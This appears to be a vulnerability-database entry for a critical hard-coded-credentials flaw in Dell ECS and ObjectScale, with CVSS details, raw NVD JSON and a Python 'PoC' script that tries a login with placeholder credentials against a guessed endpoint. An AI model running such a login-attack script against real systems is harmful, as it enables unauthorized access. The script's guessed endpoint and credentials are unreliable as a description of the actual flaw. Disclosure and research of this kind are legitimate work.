Security Vulnerability Report
中文
CVE-2026-40636 CVSS 9.8 CRITICAL

CVE-2026-40636

Published: 2026-05-11 10:16:14
Last Modified: 2026-05-11 10:16:14

Description

Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains a use of hard-coded credentials vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to filesystem access for attacker.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Dell ECS 3.8.1.0 - 3.8.1.7
Dell ObjectScale < 4.3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-40636 (Hard-coded Credentials) This script demonstrates how an unauthenticated attacker might exploit hard-coded credentials to access the filesystem. Note: Replace 'TARGET_IP' and 'HARDCODED_CREDENTIAL' with actual values from the specific vulnerable version. """ import requests import sys def exploit(target_ip): # The hard-coded credential found in the vulnerable version # Example: hardcoded_username / hardcoded_password username = "admin" # Placeholder based on typical defaults password = "HARDCODED_PASSWORD_PLACEHOLDER" # Target endpoint for management or file access url = f"https://{target_ip}/api/login" try: print(f"[*] Attempting to connect to {target_ip} using hard-coded credentials...") # Send authentication request using the hard-coded credentials response = requests.post(url, auth=(username, password), verify=False, timeout=10) if response.status_code == 200: print("[+] Authentication successful! Hard-coded credentials are valid.") print("[+] Access to filesystem potentially granted.") # In a real scenario, the attacker would now use the session token/cookie # to access file system endpoints (e.g., /api/filesystem/browse) else: print("[-] Authentication failed. Target may be patched or credentials incorrect.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <TARGET_IP>") sys.exit(1) exploit(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40636", "sourceIdentifier": "[email protected]", "published": "2026-05-11T10:16:13.623", "lastModified": "2026-05-11T10:16:13.623", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains a use of hard-coded credentials vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to filesystem access for attacker."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1", "source": "[email protected]"}]}}